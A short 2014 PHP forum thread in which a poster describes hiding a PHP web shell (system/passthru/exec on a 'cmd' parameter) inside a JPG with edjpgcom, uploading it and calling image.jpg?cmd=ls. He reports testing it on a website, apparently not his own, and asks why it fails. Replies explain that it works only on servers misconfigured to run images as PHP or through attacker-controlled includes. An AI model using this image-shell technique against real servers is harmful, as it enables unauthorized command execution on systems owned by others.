PHP Developers Network
http://forums.devnetwork.net/

is it impossible???
http://forums.devnetwork.net/viewtopic.php?f=39&t=139794
Page 1 of 1

Author:  M0TRIX [ Thu Jun 19, 2014 7:49 am ]
Post subject:  is it impossible???

hello

follow the steps:

1_download edjpgcom.exe program.

2_drag the jpg file in the edjpgcom program the u can put your cods into the jpg file

3_put these codes into it :

Syntax: [ Download ] [ Hide ]
 <?PHP
system($cmd);
passthru($cmd);
exec($cmd);
?>


>

4_upload the jpg file.

5_run it like this image.jpg?cmd=ls

do u think is it possible to run command with this method??? or other extense of image files like png gif etc..

Author:  Weirdan [ Thu Jun 19, 2014 12:19 pm ]
Post subject:  Re: is it impossible???

That's possible, however only if the webserver is misconfigured to process image files through php. Another exploit vector would exploiting attacker-controlled includes, but if that's possible it would itself be a security issue.

Author:  M0TRIX [ Thu Jun 19, 2014 5:00 pm ]
Post subject:  Re: is it impossible???

i've test it on a website.i just see the picture !!!but no command works!! why????there is php cod in it. it should work

i put <php and ?> characters in it.the webserver should recgnize it as a php file.huu??

is there any way to run our command with the picture??

so what is "edjpgcom.exe"(first post) program for?

Author:  Celauran [ Thu Jun 19, 2014 6:47 pm ]
Post subject:  Re: is it impossible???

What are you trying to do here? Having shell_exec and/or exec enabled on a server is a pretty terrible idea.

Page 1 of 1 All times are UTC - 5 hours
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/